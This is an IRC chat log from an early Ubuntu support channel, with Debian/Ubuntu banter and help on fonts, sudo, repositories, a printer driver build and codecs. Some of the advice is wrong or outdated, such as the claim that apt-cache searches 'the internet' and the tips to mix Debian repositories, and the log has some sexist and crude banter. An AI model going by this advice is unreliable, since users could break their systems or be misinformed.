TsjoklatUbuntu jumped in a big gap10:55
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logic____hey i get errors with shpcp and pciehp on bootup ... is that a common problem?10:55
topyliChrisH: also, you can't really run a company with a business plan such as "let's support debian unstable" :)10:55
ChrisHDebian has one release manager and one debian account manager. It can hardly move if single persons block the whole project.10:56
InodeSlackware was like that...but they have caught on fast10:56
TsjoklatI was reading this bug report last night... a user had problems with gparted.. all the debian developer came up with was: why in the hell do you use that?!?10:56
InodeHey is better that....." Just Reboot "10:56
Tsjoklator join #debian... ask the wrong question and you'll get banned10:56
ChrisHI'm thinking about putting more effort into Ubuntu as the scene is much more friendly and motivated.10:56
InodeHey its better than....." Just Reboot "10:56
Tsjoklatchange your nick, you'll get banned10:56
Tsjoklatadmit you are a girl, you'll get banned10:57
ChrisHTsjoklat: Although I'm developing for Debian I will never again join #debian or subscribe to debian-devel. My asbestos pants are not certified for that.10:57
PizbitTsjoklat: You're a girl?:)10:57
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Tsjoklatvery much so Pizbit :)10:57
PizbitTsjoklat: Pah, you're probably a pot bellied bald old FBI agent:)10:57
TsjoklatI had a problem... this op asks me... you are on deb? I said yes sid... he says sid?!? I said yes... he goes.. what is sid...10:58
TsjoklatI mean.. really10:58
Tsjoklatand after your rear Pizbit :P10:58
topylihrmph. debian is very cool, but you have to run unstable if you want a desktop. ubuntu basically lets people (even newbies) do that without worries10:58
Tsjoklatwhat is sid.. a debian op10:58
InodeChrisH....you a developer with Ubuntu?10:58
PizbitTsjoklat: *sigh* This is what I get for believing in stereotypes eh?10:58
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=== Pizbit grins
ChrisHSo I assume Ubuntu is a reception camp for frustrated DDs. :)10:58
ChrisHInode: Not yet.10:58
=== Inode does dev stuff for Samba
Keybukrehabilitation camp10:59
Tsjoklatit is too me Chrish :) and I am recovering very swifty10:59
Keybukwe're the Betty Ford of distros10:59
Inodealso believe in giving back10:59
dredgsid is this...thing....that....um....omg! a copy of windows!10:59
Tsjoklatlol you rather me be a bloke Pizbit?10:59
PizbitTsjoklat: Hahaha, I'm impartial, it doesn't make a difference either way, well, unless you were right here in my room.10:59
Tsjoklatlol one can dream11:00
Tsjoklatyou know... I actually smile at my box now? :)11:00
PizbitI leave dreaming for people I *know* to be my type *grin*11:00
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Tsjoklatand don't get me started about libmagick11:00
Tsjoklatppl in here now it is my favourite subject11:01
PizbitCrikey, I don't.11:01
dredgoh, and sorry, there is this law about girls using computers. especially linux. you should be adoring puppies or something...11:01
Tsjoklatthis person that maintains libmagick is unable after years to get it right!11:01
PizbitTsjoklat: grep libmagick ~/.xchat/xchatlogs > www.pastebin.com/rants hehehe11:01
TsjoklatI am not violent but I would love to hang this geezer by his ankles for a day or so11:02
dredgTsjoklat: have you tried repackaging it and submitting it to the developer? or is he just dim?11:02
TsjoklatI even send him a patch11:02
Tsjoklathe told me to get lost11:02
PizbitTsjoklat: What is wrong with it?11:03
Tsjoklatwhat isn't wrong with it11:03
PizbitNo idea, don't touch it11:03
Tsjoklatif it is working.. why does he submit 'updates' every day?11:03
Tsjoklatdo you know? does he?11:03
Tsjoklatnobody does11:03
Tsjoklathe says it is sid so he is testing it11:03
PizbitSupport it for ubuntu then eh?11:03
TsjoklatI guess he doesn't think it needs to be released11:03
Tsjoklatme luvs ubu11:04
=== Pizbit tries to remember an xchat UI tweak short of rm -rf ~/.xchat
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PizbitWant to undo the danged thing11:04
Tsjoklatah well.. I got so peeved that I gave him the link to debianlesbian11:05
Tsjoklattold him that perhaps he would be better at developing for them11:05
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Tsjoklatthey will never release anything ever11:05
PizbitShows netsplits as one line per each person instead of all on one line.11:05
Tsjoklatjust testing11:05
Tsjoklatand that is not a joke btw11:05
Tsjoklatthere is really a debian distro named debian lesbian11:05
Tsjoklatinstead of apt-get you type porn-get11:05
PizbitYeah, I ran into it the other day11:05
PizbitThat's a very bad pun with bad connotations ya know.11:06
RuffianSoldierI love Ubuntu, and to make it better: I GOT KDE TO WORK! NOW I HAVE KDE, GNOME, And XFCE! THE 3 BEST DESKTOP ENVIRON MENTS11:06
TsjoklatBarbie linux sounds more like fun11:06
PizbitHeh, that exists?11:06
spacey`kilink? :P11:06
RuffianSoldierUbuntu is the best11:07
Tsjoklatyes my niece has barbie linux11:07
Tsjoklat"Barbie really likes linux"11:07
InodeThe blonde Distro11:09
=== dredg goes on a bit of a larting spree
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InodeDoes webmin work properly with Ubuntu?11:10
wu_minghi. how do i add a new ttf font to the system and be recognized with gimp11:11
topyliInode: yes11:11
topyliInode: of course i don't use every module, but what i've tried have worked11:11
RuffianSoldierInode, just about everything works properly with ubuntu!11:12
topyliRuffianSoldier: xgalaga still doesn't work properly with polypaudio or esd, so ubuntu is no better than the others for THE ESSENTIAL app i'm using ;)11:13
RuffianSoldieri sayd ust about everyting11:14
wu_minghow do i install a ttf font?11:15
topyliRuffianSoldier: i'm just kidding. actually i do have more important uses for computers than Galaga11:15
RuffianSoldierapt-cache search ttf11:15
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wu_mingerr what does that comman do precisly?11:16
RuffianSoldierit searches for any file that has anything to do with ttf11:16
wu_mingwhich directory does it search11:17
RuffianSoldierthe internet11:17
wu_mingie which dir should i put my ttf file11:17
RuffianSoldierdo that command11:17
wu_mingi have my own ttf files though11:17
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RuffianSoldierthen i dont know, but apt-get will do it for you11:17
wu_mingok thanks11:18
RuffianSoldierlike if you do apt-cache search ttf, and it says ttf-font, then you type sudo apt-get install ttf-font11:18
RuffianSoldierand when it prompts for password, just type the password of the user your logged onto11:18
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topyliwu_ming: put your fonts in $HOME/.fonts and GNOME apps will see them11:20
RuffianSoldieroh ya, duh11:21
topyligone :(11:21
RuffianSoldierim not sure11:21
RuffianSoldiermaybe he realized the power of apt-get and is having a blast11:22
InodeNot everything works well with Ubuntu....11:22
InodeI see some users that are ubuntu incompatible11:22
InodeIBM Problems11:22
InodeIdiot Behind Machine11:22
RuffianSoldierIBM is lame, PPC is lame11:22
topyliRuffianSoldier: apt won't install random truetype fonts. even apt's powers are limited11:22
RuffianSoldierya, i figured it would not find that11:23
InodeIBM is an Acronym m811:23
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jdubtopyli: sure it will11:23
RuffianSoldieri know a good amount about apt,specially cuz of some of the stuff i did11:23
topylijdub: well after you make a package of course11:24
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RuffianSoldiertopyli, im not sure you know what your talking about11:24
RuffianSoldierim going to sleep now11:24
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topyliwu_ming had downloaded some random truetype fonts and wanted to install them. i guess it was not a debian package11:25
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thisfredInode: It would only be an acronym if IBM spelt a word11:34
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thoreauputicdict acronym: jargon> An identifier formed from some of the letters (often11:36
thoreauputic    the initials) of a phrase and used as an abbreviation.11:36
thoreauputicthisfred: I don't think it needs to be a word in itself11:37
Treenakslike USA PATRIOT ?11:37
Keybukmy understanding is that Acronyms have to be words, and that IBM is just an abbreviation11:38
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gilead_I need to install some driver for my canon LBP-1120 i fund the driver for it but its from canon japan and the page is in japanese i translated it with babelfish and it give me 3 option for download a CUPS driver, LIPS4, CAPT.... which one do i want as a gnome printer driver?11:39
thoreauputicKeybuk: well. It seems the dictionary disagrees. That's why I checked - I was interested11:39
gilead_did anyone see that??11:40
Keybukthoreauputic: which dictionary did you use?11:40
gilead_i had a problem before what ever command i did or what ever i said was not sent to the server11:40
gilead_hey Keybuk11:40
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thoreauputicKeybuk: I just ran "dict" - I think it's a US dictionary, so Oxford Dictionary may be different for instance11:41
topyligilead_: we see you. get the cups driver11:41
Keybukyeah, Oxford says "word made from initial letters of other words"11:41
gilead_you saw me before?11:41
the_oneI'm new to ubuntu, it looks great, and I want to use it as my main desktop os, but I have a few questions, am I at the right place for asking questions?11:41
thoreauputicKeybuk: aha - thanks that's interesting11:41
topyligilead_: how long ago? i saw you as you asked your question ten minutes ago11:42
Keybukit might be a British/Merkin difference, or it could be just that nobody remembers the rule anymore and it's fading out11:42
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Keybuk(or both ... given half the differences seem to be American English missing various rules)11:43
mercurusthe_one: definately, although the FAQ might already have the answer ?11:43
stvnthe_one: yes11:43
thoreauputicKeybuk: the US dict is based on quite an old Webster's I think 1913 or something11:43
gilead_topyli, then why didn't you answer?11:43
mercurusgilead_: you posted on the unoffical forum, right ? have you looked at linuxprinting.org ?11:44
topyligilead_: was shaving :)11:44
Keybukice vs. ise  being one of the rules that immediately springs to mind.  In English, the former represents a noun and the latter a verb.  advice/advise, licence/license, etc.11:45
housetierthat's different words11:45
thoreauputicKeybuk: yes, I'm in Australia and I use British spelling11:45
mercurusthoreauputic: amen. :)11:45
thoreauputicmercurus: effect and affect have quite separate meanings11:46
topylithoreauputic: i use finnish spelink11:46
thoreauputictopyli: ;)11:46
the_oneI want to add the debian-marrilat source to my sources.list, in other distros I logged as root and edited the sources list, but I just can't seem to do the same, I tried to edit the file but it's in read-only, so how can I get full access to edit any file without using the console?11:46
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stvnthe_one: sudo gedit /etc/apt/sources.list11:47
the_oneI mean generally11:47
mercurus... affect is the verb for the noun effect ... I affected it, by putting it into effect.11:47
topylithe_one: use sudo11:47
stvnthe_one: sudo11:47
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the_oneyeah, but isn't there any way of doing it with the gui?11:47
the_onejust as a curiosity11:47
thoreauputicmercurus: wrong. Look it up. Common mistake11:48
mercurusthe_one: go to Applications -> System Tool -> run as different user11:48
mercurusthoreauputic: explain the difference ?11:48
stvnthe_one: sudo vi ;)11:48
thoreauputicmercurus: affect can also be a noun: the "affect" refers to feeling11:48
the_onei tried that, it choose root, then I put my password and it says it's the wrong password!11:49
stvnthe_one: there is gksudo or something like that11:49
topylithe_one: open a terninal and run your graphical program with 'sudo graphical_program'11:49
thoreauputicmercurius: to affect something is a verb, but you can als "effect" something - differnet meanings11:49
topylithe_one: or use the menu entry mercurus told you about11:49
mercurusactually, that won't work .. it asks for root's password ...11:50
topylimercurus: oh, so it seems :)11:50
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the_oneso what is the root password? it sure isn't my user password11:50
b_e_n_zno root11:51
topylithe_one: root is disabled11:51
yann__to change is, just du sudo passwd11:51
b_e_n_zsudo -s, type your password and you get a root shell11:51
topylithe_one: to enable, give root a password with sudo11:51
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thoreauputicmercurus: "I effected a change which affects you "  "The effect of the change is profound"11:51
the_onewhy does it appear there then?11:51
the_oneif it should be disabled11:51
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mercurusthoreauputic: the second example isn't using "effect" as a verb ...11:52
topylithe_one: root must always exist. it just cannot log in in ubuntu11:53
thoreauputicmercurus: to effect= to bring about  an effect= resuly of something11:53
the_onesorry for too many noob questions..11:53
mercurusthoreauputic: yeah, I'm looking at that one ... its news to me ... but the second example wasn't an example using a verb ...11:54
elvstonehello, i'm trying to install transcode from the marillat repository, but i'm getting this: http://dose.se/~elvis/tmp.png, anyone know what i can do about it?11:54
topylithe_one: that's the kind of questions newbies ask, no problem there :)11:54
thoreauputicmercurus: it's confusing in that both can be used as verbs AND nouns11:54
thoreauputicbut the meanings vary11:54
the_onewhen I just did sudo gedit /etc/apt/sources.list I got also a message I/O warning : failed to load external entity "/root/.gnome2/gedit-metadata.xml"11:54
the_oneis something wrong?11:55
topylithe_one: if gedit works, don't mind it. it's probably because root just ran gedit for the first time and the file didn't exist yet11:56
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huttananyone know how to make ubuntu boot on a new kernel when using SATA disks ?11:56
the_onethanx again11:57
elvstonehas anyone successfully installed transcode from the marillat repository? all i'm getting from googling is that i should install it from the marillat repository, but i'm getting unresolved dependencies (http://dose.se/~elvis/tmp.png)..11:57
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topylielvstone: your url gives a 40411:58
gilead_ok thanks11:58
elvstonetopyli: hm, that's strange, not for me (tested from an outside machine too)..11:59
PizbitWorks here11:59
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Pizbitelvstone: Have you enabled universe , restricted and multiverse11:59
elvstonePizbit: on the marillat repository?12:00
PizbitNo, for ubuntu12:00
eruditusHow do I change my DNS servers permanently? I used the Network configuration tool a couple of times and it didn't work...12:00
topylielvstone: oh, the first link work, the latter got the end-of-sentence period in it :)12:00
elvstonePizbit: hm, i think i tried that before, i'll try again.12:00
the_onethe marrilat source works..thanks you for being friendly and helpful...unlike other people in other distro's IRC channel.12:00
elvstonetopyli: ah.12:00
huttanAnyone good with ubuntu+sata disks ?12:00
eruditusHow do I change my DNS servers permanently? I used the Network configuration tool a couple of times and it didn't work...12:01
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Pizbiteruditus: /etc/resolv.conf12:01
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mercurusthoreauputic: I bow down to your superior liguistic prowess ...12:01
Pizbitnameserver <ip addy>12:01
mercurusthat said, the verb/noun rule is a useful rule of thumb because the exceptions are quite limited in scope12:02
elvstonePizbit: okay, that helped some, the unresolved dependencies are not that many now.. just libjasper, libpng and libquicktime..12:02
mercurusto effect is limited almost exclusively to legal jargon relating to the promulgation of acts of parliament, and the affect noun is purely emotional ...12:03
eruditusPizbit, already changed it, but the network tool doesn't accept it.12:03
elvstonePizbit: http://dose.se/~elvis/sources.list <-- this is what i have now.. hm.12:03
thoreauputicmercurus: well, this is one of my pet pedantic peeves: very few people use thes words correctly :)12:03
mercurusmy greatest peeve is the absence of, or the incorrect use of prepositions ...12:04
Pizbitelvstone: Erm, you havn't uncommented them12:04
mercurus"I bought a couple apples" or "those are the apples I bought a couple of"12:04
eruditusPizbit: already changed it, but the network tool doesn't accept it.12:05
Pizbiteruditus: Don't parrot:P12:05
elvstonePizbit: but i have deb http://archive.ubuntu.com/ubuntu/ warty main restricted universe multiverse and deb-src http://archive.ubuntu.com/ubuntu/ warty main restricted universe multiverse, isn't that enough?12:05
thoreauputicmercurus: hehe - this is the kind of thing up with which I will not put!12:05
eruditusPizbit: ie. the network tool keeps other values even tho I change them daily.12:05
elvstonePizbit: do i need the security.ubuntu.com ones too?12:06
topyliPizbit: but he does have universe and multiverse on the uncommented lines12:06
mercurusthoreauputic: I don't like "this" either :P12:06
elvstonePizbit: sorry, i'm a fbsd guy, never used apt before.12:06
spikebhow'd ya like them apples12:06
mercurusand Shakespeare ... he had nothin'. :P12:06
thoreauputicwhat is your objection to "this" ? :)12:06
topylielvstone: what if you try the marillat testing repository instead of unstable?12:06
elvstonetopyli: hm, i'll try.12:07
Pizbitelvstone: I'd advise uncommenting the security ones myself12:07
mercurusthoreauputic: the number of essays I've read in which "this" is attempting to serve as a sentence's object, and refers to nothing I can identify ...12:07
Pizbitelvstone: Is it only the quicktime bit complaining now?12:07
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thoreauputicmercurus: I see :) Teacher?12:08
mercurusthoreauputic: student12:08
Pizbitelvstone: change unstable in the marillat lines to testing12:08
elvstonePizbit: quicktime and libjasper, using testing from marillat brought it down to two unresolved dependencies.12:08
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topylimercurus: "the attack of the giant THIS"12:08
eruditusPizbit: >System Config ->Networking doesn't report the values that I've put into resolv.conf. Changed those, but it's still not using them (the connection is much MUCH faster when it does). anything else I can change?12:08
elvstonehm, and it complained there was no Sources.gz for marillat testing.12:08
mercurustopyli: this is the problem ... you see ?12:08
thoreauputicmercurus: former English BA (Hons) ... long time ago though.12:09
elvstonei'll try uncommenting the security ones..12:09
topylimercurus: yep, this is quite ridiculous really :)12:09
Pizbitelvstone: Those shouldn't affect what you're trying to do but it's good to have them.12:09
mercurusthoreauputic: ah ... pol sci BA (hons - next year) and an LLB half-done12:09
the_oneone other question, I just installed ubuntu on my averatec laptop (prosavageddr) and I get the right resolution but not screen colors, I think I have 16bit colors, although in my xf86config-4 the default is 24bit, I even removed 16bit mode, but still no success. Could this be an xfree issue? Likely to be resolved with x.org in the next release?12:09
eruditusWell, whatever... I'll try to work it on my own, or in the debian channel...12:10
elvstonePizbit: okay.12:10
huttananyone experienced with ubuntu and SATA disks ?12:10
Pizbitelvstone: I only have one unmet dependency when I try here12:10
thoreauputicmercurus: ah - Arts-Law   Which University?12:10
elvstonePizbit: hm, okay, i have "Depend: libjasper-1.701-1 but it is not installable" and "Depend: libquicktime1 but 0.9.2release-5 is to be installed"12:11
elvstonePizbit: hm, maybe that is just one and i'm interpreting it wrong.12:11
elvstonePizbit: is libjasper failing because libquicktime fails here?12:12
elvstonePizbit: libquicktime is below libjasper in the list, and is indented one char..12:12
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ElVirolohi all12:12
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gilead_ok i am tring to build the printer driver for my friend12:13
gilead_but i get this error:12:13
gilead_**Error**: You must have `gettext' installed.12:13
gilead_Get ftp://alpha.gnu.org/gnu/gettext-0.10.35.tar.gz12:13
gilead_(or a newer version if it is available)12:13
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Pizbitelvstone: To be honest I havn't a clue heh, you might need to add in temporary the main debian archive for sarge or even sid for it12:13
gilead_I have Gettext installed! but version 0.16 and i think the latest in its time was 0.1012:14
topylielvstone: if you do that, remove it instantly after you get transcode12:14
elvstonePizbit: hm, yes.. i'll try something like that.12:14
ElViroloi suppose hundreds of people have already asked this question but ... is it possible to install KDE 3.3 on Ubuntu apart from compiling it from source?12:14
gilead_there is a glade project file for it is it easy for someone who doesn't know howto program to update its make scriptd?12:14
PizbitElVirolo: Yes, from the main debian respository12:15
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PizbitElVirolo: Of course it could break your system, but heyyy:)12:15
gilead_ElVirolo, add universe to your source.list and apt-get it12:15
Pizbitgilead_: That's 3.2 I believe12:15
challangewhy do you need kde?12:15
paperflaketis a lot o ppl12:15
gilead_Pizbit, no 3.3 is in sid and hoary12:15
ElViroloPizbit: lol, i already tried that and it did break my system, of course12:15
ElViroloyeah, tis 3.212:15
Pizbitgilead_: We're talking warty here12:15
gilead_KDE SUCKS!12:16
Pizbitgilead_: foad12:16
Pizbitpaperflake: Hey:)12:16
paperflakehi Pizbit12:16
gilead_warty is old! out of date we all now howto fix up a broke system don't we? and we all have ;)12:16
gilead_so back to my problem12:16
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RiddellElVirolo: I have KDE 3.3 packages12:16
Riddell"deb http://jasmine.19inch.net/~jr/away/ubuntu/ unstable main"12:17
Pizbitgilead_: Actually no, most people trying hoary that I've seen complain and ask for help about fixing stuff12:17
topyligilead_: is gnome 2.8 in sid yet?12:17
gilead_Pizbit, yes12:17
gilead_wait in experimental12:17
ElViroloRiddell: thk you so much!12:17
dredgim using hoary. i have had no problems, well, none that i cant fix myself12:17
gilead_Pizbit, what error i update the first min it was out of the topic and had NO BROKE PACKAGES12:18
dredgnothing major at any rate12:18
RiddellElVirolo: tell me how you get on, they arn't 100% tested so there may be dependency problems12:18
Pizbitgilead_: Uhm, so?12:18
topyligilead_: 2.9 packages are landing on hoary12:18
Pizbitgilead_: If you look at the user list or pay much attention here you'd see that a number of people aren't prepared.12:18
gilead_Pizbit, but udev is stuff so i am not rebooting12:18
=== Pizbit sniggers;)
gilead_so can we go back to my problem that i can go home?12:19
Pizbitgilead_: alt+f1 and type in ~/..12:19
Pizbiter, alt+f212:19
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gilead_Pizbit, as long as you only upgrade the right stuff you'll be okay12:19
PizbitYou wanted to go home.12:19
gilead_i am in x so ctrl+....12:19
PizbitThat'll get you to /home/12:20
paperflakeso any one like warty so far ?12:20
gilead_ok i am tring to build the printer driver for my friend12:20
Pizbitpaperflake: Yeah, lots of people do12:20
gilead_but i get this error:12:20
=== paperflake is downloading now....
gilead_**Error**: You must have `gettext' installed.12:20
gilead_Get ftp://alpha.gnu.org/gnu/gettext-0.10.35.tar.gz12:20
gilead_(or a newer version if it is available)12:20
challangewhy can't I play az mp3 file?12:20
challangefrom dvd12:20
gilead_must i re ask it!12:20
Pizbitgilead_: So install it.12:20
challangeit is trying to play it with the video player12:21
gilead_opps caps lock12:21
paperflakehmm sounds like it is going to be fun ?!12:21
challangeand the music player does not do anything12:21
gilead_read the rest as above12:21
Pizbitgilead_: gettext and gettext-base are installed? Perhaps the version in ubuntu is too new:)12:22
gilead_Pizbit, i said that the version must be too new already12:22
ElVirolog2g, thanks a lot guys12:22
Pizbitgilead_: Not while I was paying attention:)12:22
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gilead_i will upgrade gettext12:23
paperflakedoes that evolution on gnome work well ?12:23
topyligilead_: face it, the driver is b0rken12:23
Pizbittopyli: Yeah, I reckon12:23
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Pizbitgettext is 0.14.1 in ubuntu, that driver is thinking 0.10.3512:24
Pizbitpaperflake: It works as well as evolution works12:24
gilead_topyli, well it GPL i wonder why no add it into ubuntu by deafult and fixed it12:24
paperflakePizbit: that dun help me lol12:24
gilead_Pizbit, so how do i edit it that it look for 0.14.112:25
Pizbitpaperflake: Well, if you like evolution and know how to get around how convoluted it is, then yes it works well, however...12:25
paperflakeany1 got exp. with evolution and exchange ?12:25
Pizbitgilead_: NFC12:25
topyligilead_: perhaps you should maintain the driver, you have the motivation ;)12:25
PizbitNo F Clue12:25
gilead_there are a few .glade files12:25
gilead_Pizbit, i have been messing with the driver and i know what part of the script calls it12:26
gilead_you know bash you can edit it12:27
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Pizbitgilead_: I care deeply12:27
attitudeAnyone useing ubuntu on a Athlon 6412:27
gilead_i will paste it here for anyone how knows howto12:27
paperflakebbl when i got the ISO downloaded12:27
gilead_it a bit long12:27
Mithrandirattitude: yes, why?12:27
gilead_grep "^AM_GLIB_GNU_GETTEXT" $srcdir/configure.in >/dev/null && {12:27
gilead_  grep "sed.*POTFILES" $srcdir/configure.in >/dev/null || \12:27
gilead_  (glib-gettextize --version) < /dev/null > /dev/null 2>&1 || {12:27
gilead_    echo12:27
gilead_    echo "**Error**: You must have \`gettext' installed."12:27
gilead_    echo "Get ftp://alpha.gnu.org/gnu/gettext-0.10.35.tar.gz"12:27
gilead_    echo "(or a newer version if it is available)"12:27
gilead_    DIE=112:27
gilead_  }12:27
Pizbitgilead_: READ THE TOPIC!12:27
gilead_grep "^AM_GNOME_GETTEXT" $srcdir/configure.in >/dev/null && {12:28
gilead_  grep "sed.*POTFILES" $srcdir/configure.in >/dev/null || \12:28
attitudeMithrandir: Anythings I should look out for when i go to do my install today12:28
gilead_  (gettext --version) < /dev/null > /dev/null 2>&1 || {12:28
gilead_    echo12:28
gilead_    echo "**Error**: You must have \`gettext' installed."12:28
gilead_    echo "Get ftp://alpha.gnu.org/gnu/gettext-0.10.35.tar.gz"12:28
gilead_    echo "(or a newer version if it is available)"12:28
Mithrandirattitude: it's supposed to just work.12:28
gilead_    DIE=112:28
gilead_  }12:28
gilead_ok that it12:28
topyliaargh! flood! STOP IT12:28
gilead_Pizbit, what topic12:28
attitudeMithrandir: what motherboard you use12:28
gilead_OHHHHH ****12:28
gilead_ok pastebin here i come12:28
Mithrandirattitude: Epox HDA3+12:28
Pizbitgilead_: Uhm, you just alienated the whole channel, I don't think anyone's going to look at the pastebin12:28
attitudeMithrandir: ok I am using an abit12:29
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=== gilead_ is sorry
attitudethanks for the help12:29
=== gilead_ beg for forgiveness
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danielsgilead_: please don't do that again12:29
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Acridieni got this error when launching Savage ImportError: libtiff.so.3: cannot open shared object file: No such file or directory12:30
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Acridiendo I miss a dependency ?12:30
gilead_daniels, deal12:31
danielsgilead_: thanks12:31
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elvstonePizbit: adding debian testing repository for libquicktime1 seemed to work, thanks a lot.12:33
Acridiendo someone has an idea about this issue when launching the game Savage   ImportError: libtiff.so.3: cannot open shared object file: No such file or directory12:33
gilead_so is a simple edit anyone know bash?12:33
gilead_elvstone, NOOOOOOOOOOOOOOOOOOOO!12:33
Pizbitelvstone: Remove it after it's done though, migth screw up an upgrade later if it's there12:33
gilead_elvstone, if you brake your system don't come cring to us/me12:33
Pizbitgilead_: Release, it's only libquicktime and transcode, hardly anything that's gonna break the system, note the spelling of break.12:34
gilead_Pizbit, why not get him to download the debs from packages.debian.org12:34
Pizbitgilead_: What's the difference?12:34
PizbitThere's the say files.12:34
PizbitEr, They're12:35
gilead_elvstone, you know howto do a pin reset12:35
gilead_Pizbit, DEPENDECE12:35
gilead_big word12:35
Pizbitgilead_: Mind laying off the caps?12:35
gilead_but thinking they wound be the same12:35
gilead_both are uptodate12:35
topyligilead_: it's better to temporarily add the repo and get the dependencies. the important thing is to not leave it there12:36
Pizbitelvstone: So anyway, enjoy transcode :)12:36
gilead_Pizbit, sorry the keymap is stuff and each time a push two key fast caps lock goes on it internal feature12:36
Pizbitgilead_: You still have to press enter to send each line.12:36
gilead_topyli, it better to download it from packages.debian.org12:36
topyligilead_: huh? that's where apt downloads it anyway12:37
Pizbittopyli: You sound as confused as I.12:37
gilead_topyli, but the dependce don't come with it12:38
topylii better go and see if my office is still there12:38
Pizbitgilead_: Erm, you need to look up on what a .deb is, once it's installed it doesn't matter where you got it from12:38
gilead_ok anyone want to help with my error?12:38
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gilead_Pizbit, yea yea what ever12:38
gilead_Pizbit, i am sick and want to get this fixed that i can go home to bed12:39
PizbitGo home to bed then, you wont be fixing it in a hurry.12:39
gilead_is the pastebin12:39
gilead_Pizbit, i can't go home till its fixed12:39
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gilead_the person wont give me one12:39
gilead_Pizbit, you know shell/bash?12:40
gilead_you want to do a quick change to it12:40
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balubahi all12:43
gilead_sneeking out12:44
=== Pizbit cheers.
linux_mafiaanyone here using beagle?12:47
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Dr3wDoes anyone know if t would be possible to start the install process of Ubuntu off from an already booted distro?12:51
=== sid77 hello
Dr3wI would like to be able to boot into Gentoo 1.4 live CD, then start the Ubuntu linux installation from its own CD.12:51
Dr3wmy beige G3 can't boot the Ubuntu CD, the beige G3 is supported by debian/linux kernel, so so long as I can get the isntaller working, it shoudl work.12:52
PizbitWhy can't it boot the cd?12:54
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Dr3wthe G3 uses an oldworld open firmware, so you have to boot to macos first, then use BootX to kick off a kernel.12:55
MithrandirDr3w: I suspect you want to talk to Kamion, but he's got a huge headache today, so I'm not sure he's around12:55
Dr3weverythign should work the same, once its booted.12:56
mrjiveciao baluba12:56
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sid77Dr3w, doesn't work setting up bootx to boot a kernel in the ubuntu cd? (I'm on new world, so this could be a really stupid suggestion, just trying ;)01:00
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Acridienwith codecs does ubuntu mplayer come with ?01:01
Acridienwhich codecs01:01
balubaciao mrjive01:01
mercurusAcridien: usually not the ones you're looking for ... you'll also want the win32-codecs package01:01
Acridienmercurus: I need to download them from their home site ?01:02
PizbitAcridien: Have you visited the wiki about restricted formats?01:02
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PizbitAcridien: If you install the w32codecs pack from the marillat repository and use totem-xine you'll be fine01:03
AcridienPizbit: I m used to mplayer01:03
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PizbitAcridien: Ah, then just the w32codecs package01:04
AcridienPizbit: under fedora i had to set the codecs in /usr/codecs is it the same dr in ubuntu ?01:04
PizbitAcridien: Huh? Just apt-get install w32codecs01:04
mercurusAcridien: just use apt-get install win32-codecs ... assuming you have the correct repository in your apt configuration01:04
AcridienPizbit: i need codecs for .rmj01:05
PizbitAcridien: Is that not in the w32codecs package? What's rmj anyway?01:05
AcridienPizbit: realplayer thing01:05
=== sid77 think that http://wiki.ubuntulinux.org/RestrictedFormats should get some space in the topic ;)
Pizbitsid77: It does get pasted an aweful lot eh?01:06
|progenic|is there anyway a newbie can contribute to ubuntu ?01:07
sid77Pizbit, yeah right! lol01:07
Pizbitweee, put some mp3s onto my mp3 player, 84.0KB free space left over:)01:08
altan_progenic, just using it to begin with is a contribution :)01:09
altan_you can also help with documentation, I believe01:09
sid77btw, nearly off topic: nobody knows what is happening to kaffe? I worked on it for a university project last year and since then, there were no changes in the homepage01:09
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mjrit's seemed pretty slowed down to me, too, but I haven't really followed it too closely01:11
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ukaszdoes anyone know what -dev debs I need to install in order to compile mplayer with xv output support?01:15
AcridienPizbit: can you give me the adresse of marillat repository?01:15
crimsunukasz: did you add the marillat lines?01:15
Acridiencrimsun: what are the lines ?01:16
crimsunukasz: did you run `apt-get build-dep mplayer-686' ?01:16
ukaszbut there is some issue with mplayer dependencies01:16
ukaszcrimsun: ok, I need to dig some man :P01:16
Pizbitdeb ftp://ftp.nerim.net/debian-marillat/ testing main01:16
phillwhat was all this about w32codecs?01:17
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mercurusis there an RSS feed aggregator available for ubuntu without the universal repository ? apt-cache reveals no love :(01:19
Pizbitphill: Getting them:)01:19
Moofmercurus: evolution does RSS, as does thunderbird01:19
Pizbitmercurus: What's wrong with using universe?01:19
rsilvaIt seems that I can't change the default printer even as root (I tried all: the gnome thing, the web cups administration and lpoptions). What should I do?01:20
mercurusMoof: aye, evolution is a bit heavy for what I'm looking to do ... although I should really use it.01:20
phill:( i just want divx/xvid. would vlc play them?01:20
mercurusPizbit: I'm trying to keep this installation to the most common packages as a bit of a test01:20
Moofmercurus: I, persoanlly, use rawdog, btu I dont' think that's packaged for debian, let alone ubuntu01:20
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mercuruswoah, back again :)01:28
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Iodahi to all01:28
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mercuruscan someone enlighten me as to how I 'refresh' my cups client's view of the network ?01:33
mercuruseg. I have a server with a cups printer on it, which my desktop ubuntu picks up when it boots up01:34
mercurusbut I have a laptop that I connect and disconnect from the LAN, and I'd like to be able to print from it01:34
phillhow can i create more virtual desktops?01:34
mercurusat the moment, when I reconnect the laptop, it can't see the server's printer until it reboots ... and I'd like to be able to keep the laptop running01:35
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mercurusphill: right click on the desktop pager, preferences, number of desktops01:35
phillthanks :)01:35
joolzanyone know i rhythmbox can play asf streams?01:36
Acridienjoolz: have you installed gstreamer ?01:37
=== linux_galore loves streamtuned
joolzwhich plugin does asf?01:37
joolzmaybe i should mention that other streams do work (the radio stations default in RB)01:38
Acridienjoolz: sorry i mix my knowledges01:38
joolzAcridien: huh?01:38
Acridienjoolz: gstreamer has nothing to do with asf01:38
joolzoh... ok01:38
Acridienjoolz: perhaps you need win32 codecs01:39
joolzshould i install xmms? Or a pluging for RB?01:39
Moof_is there an RSS feed or mailing list for ubuntu-traffic?01:39
Acridienjoolz: i will have a look wait01:39
spivmako: ^01:39
joolzAcridien: ok, tx01:39
jdubMoof_: ubuntu-news; lists.ubuntu.com01:40
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=== linux_galore plays with helix
Moof_jdub: ta01:40
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linux_mafialinux_galore, i love streamtuner too, pity the live365 plugin dosent have a .deb, but thats a small niggle01:41
linux_galorelinux_mafia: I just compiled it..no bigie01:42
linux_mafialinux_galore, yeah me too01:42
linux_galorelinux_mafia: amazed how stable it is for such a new app01:42
linux_mafialinux_galore, yep, ive not had one prob with it, it rules, heh01:43
linux_galorelinux_mafia: Ive been listening to radio stations in Europe all week01:43
mercurussay I have an application I would like to add as a package for Ubuntu ... how do I go about it ? there appears to be no FAQ on the topic ?01:43
Acridienjoolz: well I just had a look at gstreamer plugins pkg in universe , i don't see the one that handle asf01:43
Acridienjoolz: try xmms i think01:44
joolzAcridien: ok, thanks!01:44
Acridienjoolz: ask others perhaps I m wrong01:44
linux_galoremercurus: Ubuntu uses .deb packages01:44
